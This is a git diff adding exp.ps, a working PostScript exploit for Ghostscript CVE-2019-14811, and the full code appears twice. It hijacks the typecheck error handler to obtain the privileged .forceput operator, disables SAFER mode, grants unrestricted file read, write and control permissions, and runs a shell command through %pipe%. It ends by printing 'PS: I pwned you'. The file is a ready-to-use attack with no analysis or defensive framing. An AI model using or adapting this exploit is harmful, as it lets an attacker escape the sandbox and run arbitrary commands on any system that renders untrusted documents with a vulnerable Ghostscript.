Ridter · September 23, 2019 08:45
diff --git a/exp.ps b/exp.ps
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
 % just copy from https://gist.github.com/hhc0null/82bf2e57ac93c1a48115a1b4afcde706
 /exploit {
  /println  { (\\n) exch print print } bind executeonly def
  /info     { ([*] ) print println } bind executeonly def
  /success  { ([+] ) print println } bind executeonly def
  /fail     { ([-] ) print println stop } bind executeonly def
  
  /MaxFileSize 16#10000 def
  /readfile {
    (r) file
    dup MaxFileSize string readstring pop
    exch closefile
  } bind executeonly def
  
  /osexec {
    (%pipe%) exch concatstrings readfile
  } bind executeonly def
  
  (=============================================================================)
  (=                              CVE-2019-14811                               =)
  (=============================================================================)
  println println println
  
  (Obtaining .forceput operator from .pdf_hook_DSC_Creator operator...) info
  /.forceput null def
  systemdict /.pdfdsc get 24 get /.pdf_hook_DSC_Creator exch def
  /typecheckcount 0 def
  /&typecheck errordict /typecheck get def
  errordict /typecheck {
    /typecheckcount typecheckcount 1 add def
    typecheckcount 2 eq {
      1 index 2 get 8 get
      /.forceput exch store
    } if
  } put
  null .pdf_hook_DSC_Creator clear
  (A candidate for .forceput operator found!) success
  
  (Overwriting several flags to escape from Safer Mode...) info
  systemdict /SAFER false .forceput
  userparams /LockFilePermissions false .forceput
  userparams /PermitFileControl [(*)] .forceput
  userparams /PermitFileWriting [(*)] .forceput
  userparams /PermitFileReading [(*)] .forceput
  save restore
  
  SAFER { 
    (Could not escape from Safer Mode.) fail
  } bind executeonly if
  (Successfully escaped from Safer Mode!) success
  
  (Executing a shell command...) info
  (touch /tmp/pwned) osexec pop
  (PS: I pwned you <3) success
 } def
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
 exploit
 quit
	%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
	% just copy from https://gist.github.com/hhc0null/82bf2e57ac93c1a48115a1b4afcde706
	/exploit {
	/println { (\\n) exch print print } bind executeonly def
	/info { ([*] ) print println } bind executeonly def
	/success { ([+] ) print println } bind executeonly def
	/fail { ([-] ) print println stop } bind executeonly def

	/MaxFileSize 16#10000 def
	/readfile {
	(r) file
	dup MaxFileSize string readstring pop
	exch closefile
	} bind executeonly def

	/osexec {
	(%pipe%) exch concatstrings readfile
	} bind executeonly def

	(=============================================================================)
	(= CVE-2019-14811 =)
	(=============================================================================)
	println println println

	(Obtaining .forceput operator from .pdf_hook_DSC_Creator operator...) info
	/.forceput null def
	systemdict /.pdfdsc get 24 get /.pdf_hook_DSC_Creator exch def
	/typecheckcount 0 def
	/&typecheck errordict /typecheck get def
	errordict /typecheck {
	/typecheckcount typecheckcount 1 add def
	typecheckcount 2 eq {
	1 index 2 get 8 get
	/.forceput exch store
	} if
	} put
	null .pdf_hook_DSC_Creator clear
	(A candidate for .forceput operator found!) success

	(Overwriting several flags to escape from Safer Mode...) info
	systemdict /SAFER false .forceput
	userparams /LockFilePermissions false .forceput
	userparams /PermitFileControl [(*)] .forceput
	userparams /PermitFileWriting [(*)] .forceput
	userparams /PermitFileReading [(*)] .forceput
	save restore

	SAFER {
	(Could not escape from Safer Mode.) fail
	} bind executeonly if
	(Successfully escaped from Safer Mode!) success

	(Executing a shell command...) info
	(touch /tmp/pwned) osexec pop
	(PS: I pwned you <3) success
	} def
	%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
	exploit
	quit